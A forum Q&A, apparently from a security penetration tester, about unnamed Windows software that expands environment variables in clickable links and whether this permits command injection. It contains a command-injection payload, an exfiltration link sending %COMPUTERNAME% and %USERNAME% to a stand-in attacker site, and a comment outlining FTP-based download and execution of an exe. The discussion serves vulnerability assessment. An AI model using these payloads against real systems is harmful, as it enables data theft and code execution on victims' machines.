# Exploiting a not properly escaped string in batch

Tags: windows, security, batch-file, escaping, dos

In Windows software X every link you formulate is automatically converted into a clickable object.

The interesting and security-relevant part here is, that a link like "http://%COMPUTERNAME%.com/" will open the standard browser calling e.g. "http://NR57005-PC.com/", which of course is an information disclosure vulnerability, as all environment variables are converted.

Now my question is, whether this behaviour could lead to more critical issues - e.g. code execution vulnerabilities, which would highly increase the importance of a quick fix.

Do you have any suggestions how to prove, that this this is not only a disclosure issue but a critical vulnerability? Could an attacker inject batch commands by any chance?

I already played around with pipes, ampersands and quotes but so far I didn't find anything interesting.

Thanks in advance,

Patrick

Edit:
To clarify, my approach was the following:
The system must be executing a command like `firefox.exe "http://%COMPUTERNAME%.com/"`, otherwise the system variable would not be converted.
And now, for I know that there is some unfiltered batch call going on, I thought it could be possible to escape the parameter string. For instance, a link like `http://google.com/"&notepad&"` *could* have resulted in `firefox.exe "http//google.com"&notepad&""`, which would have opened the notepad - as a proof of concept that code execution works. Unfortunately this escaping attempt did not work. Therefore I wonder, if there are other tricks to gain shell access or similar.

Answer (score 0):

- Your attacker would have to register and control the server `NR57005-PC.com`.  To do so, he would have to have prior information about the hostname(s).
- The attack surface presented will depend on the User Agent used to retrieve the link, which will depend on your batch file processing and/or the default browser configured on the system.
- Assuming Internet Explorer, your attack surface will be reduced from what you may expect thinking about it as a batch file, because the website will no longer be in the `Local Computer` zone, but the `Internet Zone.`  Crafty tricks like you're considering won't work.
- You're left with using a typical IE vulnerability to gain control.  The batch file gains you the opportunity, without depending on a user to visit a malicious website.

I assume you're a pen-tester/auditor and are trying to qualify a finding.  I'd recommend

1 - hacking together a demo, but depending on user error to run an executable or similar.  You can make the claim a user isn't expecting the browser to give an exe, and thus will be more trusting, even though he should not be.

2 - Recognize the fact it's not a critical vulnerability and move on.   An attacker can get the same access/trust more easily through a well-crafted social engineering email.

Comment: The attacker does not have to have prior knowledge as is my case it is possible to create a link like "http://attackerssite.com/save.php?a=%COMPUTERNAME%&b=%USERNAME%". If the victim clicks on this link, he would disclose private information, if the attacker logs the variables a and b.

Comment: so the env variable is in the URI, not the hostname as you've described in your question?

Comment: The attacker crafts the link and puts the variables anywhere he wants. When the victim receives the link and clicks on it, these variables get replaced by their real values (at the victims PC). So yes, the env variables can be anywhere in the link.

Comment: if you have that kind of control, you don't need to be concerned with environment variable expansion.  the & tricks should work.  on windows it's &&.  notepad && notepad.  echo FTP commands to a file, call ftp with the -s switch to get an exe then run the exe.  if you've really got no constraints that should work.

Comment: Thanks for you thoughts, but that's exactly the point. Unfortunately the && trick does not work, neither does any attempt with the pipe or trying to escape by adding quotes. They are handled "correctly", remain part of the url and are apparently not interpreted as batch syntax. So are there any other tricks I could try?

Comment: if that doesn't work, you'll have to be more explicit about the control you have.